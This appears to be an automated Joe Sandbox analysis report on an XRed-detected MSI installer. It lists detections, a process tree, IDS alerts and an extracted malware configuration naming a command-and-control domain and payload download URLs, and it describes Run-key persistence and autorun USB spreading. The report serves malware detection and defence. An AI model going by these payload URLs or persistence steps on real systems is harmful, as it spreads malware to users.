Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xyxmml.msi

Overview

General Information

Sample name:xyxmml.msi
Analysis ID:1582349
MD5:51dd5767de678bb6359cbb175319f0ec
SHA1:76ae487dda6cf3651a9b2b30614c0fefd1f3149c
SHA256:5a49f64634ac29f37b3e53f5a1e37b90e8f3a385683f24083c68aee092408314
Tags:knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7008 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\xyxmml.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 2976 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSID754.tmp (PID: 7108 cmdline: "C:\Windows\Installer\MSID754.tmp" MD5: 1D2237FAF8E6198625010CB580280901)
      • Synaptics.exe (PID: 1360 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7103F3EEC43BBABE34068295157F9F1C)
        • WerFault.exe (PID: 7792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 6256 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 2508 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • Synaptics.exe (PID: 7640 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7103F3EEC43BBABE34068295157F9F1C)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
xyxmml.msiJoeSecurity_XRedYara detected XRedJoe Security
    xyxmml.msiJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\Installer\63d57e.msiJoeSecurity_XRedYara detected XRedJoe Security
        C:\Windows\Installer\63d57e.msiJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Windows\Installer\MSID6D6.tmpJoeSecurity_XRedYara detected XRedJoe Security
            C:\Windows\Installer\MSID6D6.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\RCXDBF7.tmpJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Process Memory Space: MSID754.tmp PID: 7108JoeSecurity_XRedYara detected XRedJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      3.0.MSID754.tmp.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                        3.0.MSID754.tmp.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSID754.tmp, ProcessId: 7108, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                          Sigma detected: Office Macro File Creation
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 1360, TargetFilename: C:\Users\user\AppData\Local\Temp\13zKLTpU.xlsm

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-30T11:49:18.852668+010020448871A Network Trojan was detected192.168.2.949761142.250.186.78443TCP
                          2024-12-30T11:49:18.937710+010020448871A Network Trojan was detected192.168.2.949762142.250.186.78443TCP
                          2024-12-30T11:49:19.827160+010020448871A Network Trojan was detected192.168.2.949771142.250.186.78443TCP
                          2024-12-30T11:49:19.917343+010020448871A Network Trojan was detected192.168.2.949774142.250.186.78443TCP
                          2024-12-30T11:49:20.805020+010020448871A Network Trojan was detected192.168.2.949785142.250.186.78443TCP
                          2024-12-30T11:49:20.938424+010020448871A Network Trojan was detected192.168.2.949787142.250.186.78443TCP
                          2024-12-30T11:49:21.918738+010020448871A Network Trojan was detected192.168.2.949797142.250.186.78443TCP
                          2024-12-30T11:49:21.926861+010020448871A Network Trojan was detected192.168.2.949798142.250.186.78443TCP
                          2024-12-30T11:49:23.528849+010020448871A Network Trojan was detected192.168.2.949818142.250.186.78443TCP
                          2024-12-30T11:49:23.558167+010020448871A Network Trojan was detected192.168.2.949819142.250.186.78443TCP
                          2024-12-30T11:49:24.537920+010020448871A Network Trojan was detected192.168.2.949832142.250.186.78443TCP
                          2024-12-30T11:49:24.623616+010020448871A Network Trojan was detected192.168.2.949828142.250.186.78443TCP
                          2024-12-30T11:49:39.479104+010020448871A Network Trojan was detected192.168.2.949841142.250.186.78443TCP
                          2024-12-30T11:49:39.486308+010020448871A Network Trojan was detected192.168.2.949842142.250.186.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-30T11:49:19.278537+010028326171Malware Command and Control Activity Detected192.168.2.94977069.42.215.25280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\ProgramData\Synaptics\RCXDBF7.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\RCXDBF7.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Windows\Installer\MSID754.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Windows\Installer\MSID754.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Found malware configuration
                          Source: xyxmml.msiMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                          Source: C:\Windows\Installer\MSID754.tmpReversingLabs: Detection: 92%
                          Source: C:\Windows\SysWOW64\._cache_MSID754.tmpReversingLabs: Detection: 50%
                          Multi AV Scanner detection for submitted file
                          Source: xyxmml.msiReversingLabs: Detection: 65%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                          Source: C:\ProgramData\Synaptics\RCXDBF7.tmpJoe Sandbox ML: detected
                          Source: C:\Windows\SysWOW64\._cache_MSID754.tmpJoe Sandbox ML: detected
                          Source: C:\Windows\Installer\MSID754.tmpJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49761 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49771 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49772 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49774 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49773 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49785 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49818 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49819 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49829 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49828 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49832 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49831 version: TLS 1.2
                          Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                          Source: MSID754.tmp, 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: MSID754.tmp, 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: MSID754.tmp, 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                          Source: xyxmml.msiBinary or memory string: [autorun]
                          Source: xyxmml.msiBinary or memory string: [autorun]
                          Source: xyxmml.msiBinary or memory string: autorun.inf
                          Source: Synaptics.exe.3.drBinary or memory string: [autorun]
                          Source: Synaptics.exe.3.drBinary or memory string: [autorun]
                          Source: Synaptics.exe.3.drBinary or memory string: autorun.inf
                          Source: 63d57e.msi.2.drBinary or memory string: [autorun]
                          Source: 63d57e.msi.2.drBinary or memory string: [autorun]
                          Source: 63d57e.msi.2.drBinary or memory string: autorun.inf
                          Source: ~$cache1.4.drBinary or memory string: [autorun]
                          Source: ~$cache1.4.drBinary or memory string: [autorun]
                          Source: ~$cache1.4.drBinary or memory string: autorun.inf
                          Source: RCXDBF7.tmp.3.drBinary or memory string: [autorun]
                          Source: RCXDBF7.tmp.3.drBinary or memory string: [autorun]
                          Source: RCXDBF7.tmp.3.drBinary or memory string: autorun.inf
                          Source: MSID6D6.tmp.2.drBinary or memory string: [autorun]
                          Source: MSID6D6.tmp.2.drBinary or memory string: [autorun]
                          Source: MSID6D6.tmp.2.drBinary or memory string: autorun.inf
                          Source: MSID754.tmp.2.drBinary or memory string: [autorun]
                          Source: MSID754.tmp.2.drBinary or memory string: [autorun]
                          Source: MSID754.tmp.2.drBinary or memory string: autorun.inf
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\userJump to behavior
                          Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.9:49770 -> 69.42.215.252:80
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49787 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49774 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49785 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49761 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49798 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49797 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49762 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49818 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49828 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49771 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49819 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49841 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49842 -> 142.250.186.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49832 -> 142.250.186.78:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: xred.mooo.com
                          Uses dynamic DNS services
                          Source: unknownDNS query: name: freedns.afraid.org
                          Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ogle.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.fla